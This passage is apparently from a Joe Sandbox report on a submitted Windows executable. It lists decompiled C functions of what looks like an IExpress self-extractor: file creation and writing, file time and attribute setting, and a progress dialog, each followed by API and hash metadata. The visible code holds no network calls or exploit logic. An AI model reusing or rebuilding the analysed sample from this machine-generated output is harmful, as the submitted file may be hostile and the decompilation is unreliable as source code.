                                                          						}
                                                          						_t30 = E010C47E0( &_v268);
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						 *0x10c93f4 =  *0x10c93f4 + 1;
                                                          						_t33 = _t75;
                                                          						goto L35;
                                                          					}
                                                          					_t44 = _t36 - 1;
                                                          					__eflags = _t44;
                                                          					if(_t44 == 0) {
                                                          						_t54 = 0x10c91e4;
                                                          						_t63 = 0x10c91e4;
                                                          						do {
                                                          							_t45 =  *_t63;
                                                          							_t63 =  &(_t63[1]);
                                                          							__eflags = _t45;
                                                          						} while (_t45 != 0);
                                                          						_t74 =  *(_t75 + 4);
                                                          						_t64 = _t63 - 0x10c91e5;
                                                          						__eflags = _t64;
                                                          						_t69 =  &(_t74[1]);
                                                          						do {
                                                          							_t46 =  *_t74;
                                                          							_t74 =  &(_t74[1]);
                                                          							__eflags = _t46;
                                                          						} while (_t46 != 0);
                                                          						_t73 = _t74 - _t69;
                                                          						_t30 = _t64 + 1 + _t74 - _t69;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 = 0x10c91e4;
                                                          						_t30 = E010C4702( &_v268, 0x10c91e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                          						_t30 = E010C4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						E010C4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                          						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                          						__eflags = _t50;
                                                          						if(_t50 != 0) {
                                                          							_t51 = _t50 & 0x00000027;
                                                          							__eflags = _t51;
                                                          						} else {
                                                          							_t51 = 0x80;
                                                          						}
                                                          						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t33 = 1;
                                                          							goto L35;
                                                          						}
                                                          					}
                                                          					_t30 = _t44 - 1;
                                                          					__eflags = _t30;
                                                          					if(_t30 == 0) {
                                                          						goto L3;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				if(_a4 == 3) {
                                                          					_t30 = E010C4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                          				}
                                                          				goto L3;
                                                          			}































                                                          0x010c4cd0
                                                          0x010c4cdb
                                                          0x010c4ce0
                                                          0x010c4ce2
                                                          0x010c4cee
                                                          0x010c4cf2
                                                          0x010c4d0e
                                                          0x010c4d0e
                                                          0x010c4d11
                                                          0x010c4e83
                                                          0x010c4e88
                                                          0x010c4e98
                                                          0x010c4e98
                                                          0x010c4d17
                                                          0x010c4d17
                                                          0x010c4d1a
                                                          0x010c4d2f
                                                          0x010c4d2f
                                                          0x00000000
                                                          0x010c4d2f
                                                          0x010c4d1c
                                                          0x010c4d1c
                                                          0x010c4d1f
                                                          0x010c4dcb
                                                          0x010c4dd0
                                                          0x010c4dd2
                                                          0x010c4ddd
                                                          0x010c4ddd
                                                          0x010c4de3
                                                          0x010c4de8
                                                          0x010c4ded
                                                          0x010c4ded
                                                          0x010c4def
                                                          0x010c4df0
                                                          0x010c4df0
                                                          0x010c4df4
                                                          0x010c4df4
                                                          0x010c4df6
                                                          0x010c4df9
                                                          0x010c4dfc
                                                          0x010c4dfc
                                                          0x010c4dfe
                                                          0x010c4dff
                                                          0x010c4dff
                                                          0x010c4e03
                                                          0x010c4e08
                                                          0x010c4e0a
                                                          0x010c4e0f
                                                          0x010c4d03
                                                          0x010c4d03
                                                          0x00000000
                                                          0x010c4d03
                                                          0x010c4e18
                                                          0x010c4e20
                                                          0x010c4e25
                                                          0x010c4e27
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4e33
                                                          0x010c4e38
                                                          0x010c4e3a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4e40
                                                          0x010c4e51
                                                          0x010c4e56
                                                          0x010c4e5b
                                                          0x010c4e5e
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4e6a
                                                          0x010c4e6f
                                                          0x010c4e71
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4e77
                                                          0x010c4e7d
                                                          0x00000000
                                                          0x010c4e7d
                                                          0x010c4d25
                                                          0x010c4d25
                                                          0x010c4d28
                                                          0x010c4d36
                                                          0x010c4d3b
                                                          0x010c4d40
                                                          0x010c4d40
                                                          0x010c4d42
                                                          0x010c4d43
                                                          0x010c4d43
                                                          0x010c4d47
                                                          0x010c4d4a
                                                          0x010c4d4a
                                                          0x010c4d4c
                                                          0x010c4d4f
                                                          0x010c4d4f
                                                          0x010c4d51
                                                          0x010c4d52
                                                          0x010c4d52
                                                          0x010c4d56
                                                          0x010c4d5b
                                                          0x010c4d5d
                                                          0x010c4d62
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4d67
                                                          0x010c4d6f
                                                          0x010c4d74
                                                          0x010c4d76
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4d7c
                                                          0x010c4d84
                                                          0x010c4d89
                                                          0x010c4d8b
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4d94
                                                          0x010c4d99
                                                          0x010c4d9e
                                                          0x010c4da1
                                                          0x010c4daa
                                                          0x010c4daa
                                                          0x010c4da3
                                                          0x010c4da3
                                                          0x010c4da3
                                                          0x010c4db5
                                                          0x010c4dbb
                                                          0x010c4dbd
                                                          0x00000000
                                                          0x010c4dc3
                                                          0x010c4dc5
                                                          0x00000000
                                                          0x010c4dc5
                                                          0x010c4dbd
                                                          0x010c4d2a
                                                          0x010c4d2a
                                                          0x010c4d2d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4d2d
                                                          0x010c4cf8
                                                          0x010c4cfd
                                                          0x010c4d02
                                                          0x00000000

                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010C4DB5
                                                          • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010C4DDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AttributesFileItemText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 3625706803-1193786559
                                                          • Opcode ID: 0fcac0f4a30c0ebf4189190e0f1c3aba61b5a010a1227cb876c46da668da0bc6
                                                          • Instruction ID: d78f2ad99cb392530ed509209cd0c29ddb7e23f755cf5f9538e5040aed03e514
                                                          • Opcode Fuzzy Hash: 0fcac0f4a30c0ebf4189190e0f1c3aba61b5a010a1227cb876c46da668da0bc6
                                                          • Instruction Fuzzy Hash: 644103366041068ADB76BF2CD9A46FD77E5FB45B00F0486ACD8C2D7285DA32DA46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4C37(signed int __ecx, int __edx, int _a4) {
                                                          				struct _FILETIME _v12;
                                                          				struct _FILETIME _v20;
                                                          				FILETIME* _t14;
                                                          				int _t15;
                                                          				signed int _t21;
                                                          
                                                          				_t21 = __ecx * 0x18;
                                                          				if( *((intOrPtr*)(_t21 + 0x10c8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					_t14 =  &_v12;
                                                          					_t15 = SetFileTime( *(_t21 + 0x10c8d74), _t14, _t14, _t14); // executed
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					return 1;
                                                          				}
                                                          			}








                                                          0x010c4c40
                                                          0x010c4c4a
                                                          0x010c4c8d
                                                          0x00000000
                                                          0x010c4c70
                                                          0x010c4c70
                                                          0x010c4c7e
                                                          0x010c4c86
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c4c8a

                                                          APIs
                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010C4C54
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010C4C66
                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 010C4C7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Time$File$DateLocal
                                                          • String ID:
                                                          • API String ID: 2071732420-0
                                                          • Opcode ID: c0b3d09a6624de09fe0eacc9b760524aca864de75d803678a9509e5ea703afab
                                                          • Instruction ID: ed371cef526a72e8e4ebf40b9f2fe30c60beae0d17f09cd91075bbd979dd3f32
                                                          • Opcode Fuzzy Hash: c0b3d09a6624de09fe0eacc9b760524aca864de75d803678a9509e5ea703afab
                                                          • Instruction Fuzzy Hash: 0AF0C232A0010DAEABA09FA8CC889BF7BECFB04640704456FA981C2050F631D504CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E010C487A(CHAR* __ecx, signed int __edx) {
                                                          				void* _t7;
                                                          				CHAR* _t11;
                                                          				long _t18;
                                                          				long _t23;
                                                          
                                                          				_t11 = __ecx;
                                                          				asm("sbb edi, edi");
                                                          				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                          				if((__edx & 0x00000100) == 0) {
                                                          					asm("sbb esi, esi");
                                                          					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                          				} else {
                                                          					if((__edx & 0x00000400) == 0) {
                                                          						asm("sbb esi, esi");
                                                          						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                          					} else {
                                                          						_t23 = 1;
                                                          					}
                                                          				}
                                                          				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                          				if(_t7 != 0xffffffff || _t23 == 3) {
                                                          					return _t7;
                                                          				} else {
                                                          					E010C490C(_t11);
                                                          					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                          				}
                                                          			}







                                                          0x010c4880
                                                          0x010c488c
                                                          0x010c4894
                                                          0x010c48a0
                                                          0x010c48c9
                                                          0x010c48ce
                                                          0x010c48a2
                                                          0x010c48a8
                                                          0x010c48b7
                                                          0x010c48bc
                                                          0x010c48aa
                                                          0x010c48ac
                                                          0x010c48ac
                                                          0x010c48a8
                                                          0x010c48de
                                                          0x010c48e7
                                                          0x010c490b
                                                          0x010c48ee
                                                          0x010c48f0
                                                          0x00000000
                                                          0x010c4902

                                                          APIs
                                                          • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010C4A23,?,010C4F67,*MEMCAB,00008000,00000180), ref: 010C48DE
                                                          • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010C4F67,*MEMCAB,00008000,00000180), ref: 010C4902
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 316b4db39b5c8e838fcb9ff7899f7f46f177d23d0bd8bae35959d70cb33421d8
                                                          • Instruction ID: d1f19c8e8b94e47a6a63019dadda059bbc0bb9548c07e61b05587f0e059e311a
                                                          • Opcode Fuzzy Hash: 316b4db39b5c8e838fcb9ff7899f7f46f177d23d0bd8bae35959d70cb33421d8
                                                          • Instruction Fuzzy Hash: F8016DA3E115742AF36442294C98FFF555CEBDAA34F1B0339BEEAE71C1D5644C0486E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C4AD0(signed int _a4, void* _a8, long _a12) {
                                                          				signed int _t9;
                                                          				int _t12;
                                                          				signed int _t14;
                                                          				signed int _t15;
                                                          				void* _t20;
                                                          				struct HWND__* _t21;
                                                          				signed int _t24;
                                                          				signed int _t25;
                                                          
                                                          				_t20 =  *0x10c858c; // 0x268
                                                          				_t9 = E010C3680(_t20);
                                                          				if( *0x10c91d8 == 0) {
                                                          					_push(_t24);
                                                          					_t12 = WriteFile( *(0x10c8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                          					if(_t12 != 0) {
                                                          						_t25 = _a12;
                                                          						if(_t25 != 0xffffffff) {
                                                          							_t14 =  *0x10c9400; // 0x9e600
                                                          							_t15 = _t14 + _t25;
                                                          							 *0x10c9400 = _t15;
                                                          							if( *0x10c8184 != 0) {
                                                          								_t21 =  *0x10c8584; // 0x0
                                                          								if(_t21 != 0) {
                                                          									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10c93f8, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t25 = _t24 | 0xffffffff;
                                                          					}
                                                          					return _t25;
                                                          				} else {
                                                          					return _t9 | 0xffffffff;
                                                          				}
                                                          			}











                                                          0x010c4ad5
                                                          0x010c4adb
                                                          0x010c4ae7
                                                          0x010c4aee
                                                          0x010c4b05
                                                          0x010c4b0d
                                                          0x010c4b14
                                                          0x010c4b1a
                                                          0x010c4b1c
                                                          0x010c4b21
                                                          0x010c4b2a
                                                          0x010c4b2f
                                                          0x010c4b31
                                                          0x010c4b39
                                                          0x010c4b54
                                                          0x010c4b54
                                                          0x010c4b39
                                                          0x010c4b2f
                                                          0x010c4b0f
                                                          0x010c4b0f
                                                          0x010c4b0f
                                                          0x010c4b5e
                                                          0x010c4ae9
                                                          0x010c4aed
                                                          0x010c4aed

                                                          APIs
                                                            • Part of subcall function 010C3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010C369F
                                                            • Part of subcall function 010C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36B2
                                                            • Part of subcall function 010C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36DA
                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010C4B05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                          • String ID:
                                                          • API String ID: 1084409-0
                                                          • Opcode ID: 5f55042847877cf8a32f815263635d9f5bc61fd6f19ff56e494744922bfcf0f1
                                                          • Instruction ID: ff8a2dcbbde13cc9acf54295a2a61c697049e00a8a235b2d4b094466ee9951ca
                                                          • Opcode Fuzzy Hash: 5f55042847877cf8a32f815263635d9f5bc61fd6f19ff56e494744922bfcf0f1
                                                          • Instruction Fuzzy Hash: B90180312002059FD7248F58DC15BAA7B99F744B2AF04C269FAB9D71D4CB769811CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C658A(char* __ecx, void* __edx, char* _a4) {
                                                          				intOrPtr _t4;
                                                          				char* _t6;
                                                          				char* _t8;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				char* _t16;
                                                          				intOrPtr* _t17;
                                                          				void* _t18;
                                                          				char* _t19;
                                                          
                                                          				_t16 = __ecx;
                                                          				_t10 = __edx;
                                                          				_t17 = __ecx;
                                                          				_t1 = _t17 + 1; // 0x10c8b3f
                                                          				_t12 = _t1;
                                                          				do {
                                                          					_t4 =  *_t17;
                                                          					_t17 = _t17 + 1;
                                                          				} while (_t4 != 0);
                                                          				_t18 = _t17 - _t12;
                                                          				_t2 = _t18 + 1; // 0x10c8b40
                                                          				if(_t2 < __edx) {
                                                          					_t19 = _t18 + __ecx;
                                                          					if(_t19 > __ecx) {
                                                          						_t8 = CharPrevA(__ecx, _t19); // executed
                                                          						if( *_t8 != 0x5c) {
                                                          							 *_t19 = 0x5c;
                                                          							_t19 =  &(_t19[1]);
                                                          						}
                                                          					}
                                                          					_t6 = _a4;
                                                          					 *_t19 = 0;
                                                          					while( *_t6 == 0x20) {
                                                          						_t6 = _t6 + 1;
                                                          					}
                                                          					return E010C16B3(_t16, _t10, _t6);
                                                          				}
                                                          				return 0x8007007a;
                                                          			}












                                                          0x010c6592
                                                          0x010c6594
                                                          0x010c6596
                                                          0x010c6598
                                                          0x010c6598
                                                          0x010c659b
                                                          0x010c659b
                                                          0x010c659d
                                                          0x010c659e
                                                          0x010c65a2
                                                          0x010c65a4
                                                          0x010c65a9
                                                          0x010c65b2
                                                          0x010c65b6
                                                          0x010c65ba
                                                          0x010c65c3
                                                          0x010c65c5
                                                          0x010c65c8
                                                          0x010c65c8
                                                          0x010c65c3
                                                          0x010c65c9
                                                          0x010c65cc
                                                          0x010c65d2
                                                          0x010c65d1
                                                          0x010c65d1
                                                          0x00000000
                                                          0x010c65dc
                                                          0x00000000

                                                          APIs
                                                          • CharPrevA.USER32(010C8B3E,010C8B3F,00000001,010C8B3E,-00000003,?,010C60EC,010C1140,?), ref: 010C65BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: 816e056de38a3b894202f0d71e85867d6e7dd44c684931f414d284ea0ef5f16c
                                                          • Instruction ID: 857b3c9c234c5a9ecf14d2ba4919a33ec510266d8f88467e0d5bb70788ca3a64
                                                          • Opcode Fuzzy Hash: 816e056de38a3b894202f0d71e85867d6e7dd44c684931f414d284ea0ef5f16c
                                                          • Instruction Fuzzy Hash: EDF042725082509FD331071D9884BAEBFDD9BE9550F38019EE9DAC3305DA674C458BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C621E() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t5;
                                                          				void* _t9;
                                                          				void* _t13;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				signed int _t21;
                                                          
                                                          				_t5 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t5 ^ _t21;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					0x4f0 = 2;
                                                          					_t9 = E010C597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                          				} else {
                                                          					E010C44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                          					 *0x10c9124 = E010C6285();
                                                          					_t9 = 0;
                                                          				}
                                                          				return E010C6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                          			}











                                                          0x010c6229
                                                          0x010c6230
                                                          0x010c6247
                                                          0x010c626a
                                                          0x010c6272
                                                          0x010c6249
                                                          0x010c6255
                                                          0x010c625f
                                                          0x010c6264
                                                          0x010c6264
                                                          0x010c6284

                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010C623F
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                          • String ID:
                                                          • API String ID: 381621628-0
                                                          • Opcode ID: 95d350ebbad1d95a225b9fe5530feed2696896c86bf175341f4741af61f494f1
                                                          • Instruction ID: 5427025dd42c723de9bfc3f84120757e6e5a2df36e05befa633550192589a768
                                                          • Opcode Fuzzy Hash: 95d350ebbad1d95a225b9fe5530feed2696896c86bf175341f4741af61f494f1
                                                          • Instruction Fuzzy Hash: 57F0B4B07002096FD770EB748D01BFE72A9DB54B00F50006EA9C5D7181ED7699408F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4B60(signed int _a4) {
                                                          				signed int _t9;
                                                          				signed int _t15;
                                                          
                                                          				_t15 = _a4 * 0x18;
                                                          				if( *((intOrPtr*)(_t15 + 0x10c8d64)) != 1) {
                                                          					_t9 = FindCloseChangeNotification( *(_t15 + 0x10c8d74)); // executed
                                                          					if(_t9 == 0) {
                                                          						return _t9 | 0xffffffff;
                                                          					}
                                                          					 *((intOrPtr*)(_t15 + 0x10c8d60)) = 1;
                                                          					return 0;
                                                          				}
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d60)) = 1;
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d68)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d70)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d6c)) = 0;
                                                          				return 0;
                                                          			}





                                                          0x010c4b66
                                                          0x010c4b74
                                                          0x010c4b98
                                                          0x010c4ba0
                                                          0x00000000
                                                          0x010c4bac
                                                          0x010c4ba4
                                                          0x00000000
                                                          0x010c4ba4
                                                          0x010c4b78
                                                          0x010c4b7e
                                                          0x010c4b84
                                                          0x010c4b8a
                                                          0x00000000

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010C4FA1,00000000), ref: 010C4B98
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 122bd7cc6b51a48c7388713983563a286686053811cee0541c31ef725129ec4b
                                                          • Instruction ID: de0750e5fb6ad020d44fb0dc01b5ef0c2d0d1f357bb10f059dbe26eaa92e7f88
                                                          • Opcode Fuzzy Hash: 122bd7cc6b51a48c7388713983563a286686053811cee0541c31ef725129ec4b
                                                          • Instruction Fuzzy Hash: 13F01271D00B09AE4771AF29DC0069FBBE6BA956613148D2FA5EED2150F7306441DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C66AE(CHAR* __ecx) {
                                                          				unsigned int _t1;
                                                          
                                                          				_t1 = GetFileAttributesA(__ecx); // executed
                                                          				if(_t1 != 0xffffffff) {
                                                          					return  !(_t1 >> 4) & 0x00000001;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}




                                                          0x010c66b1
                                                          0x010c66ba
                                                          0x010c66c7
                                                          0x010c66bc
                                                          0x010c66be
                                                          0x010c66be

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,010C4777,?,010C4E38,?), ref: 010C66B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: e7642888bf18f1af8f95bf055a3a2d254b958f6a9e571c7a975b07031b9d3f26
                                                          • Instruction ID: 1ca0fff231c36d7163d3c7a23f5a679f5331d2cba1adbac846761f193e0ecc8a
                                                          • Opcode Fuzzy Hash: e7642888bf18f1af8f95bf055a3a2d254b958f6a9e571c7a975b07031b9d3f26
                                                          • Instruction Fuzzy Hash: 50B09276222444876A710735682955A3881A6C163A7E41B94F072C12D4DA3FD446E904
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4CA0(long _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalAlloc(0, _a4); // executed
                                                          				return _t2;
                                                          			}




                                                          0x010c4caa
                                                          0x010c4cb1

                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000000,?), ref: 010C4CAA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 29fb8340fa1e6f76654e260a74402cd56a20e6d96b947e30e41a32a22a6e6e24
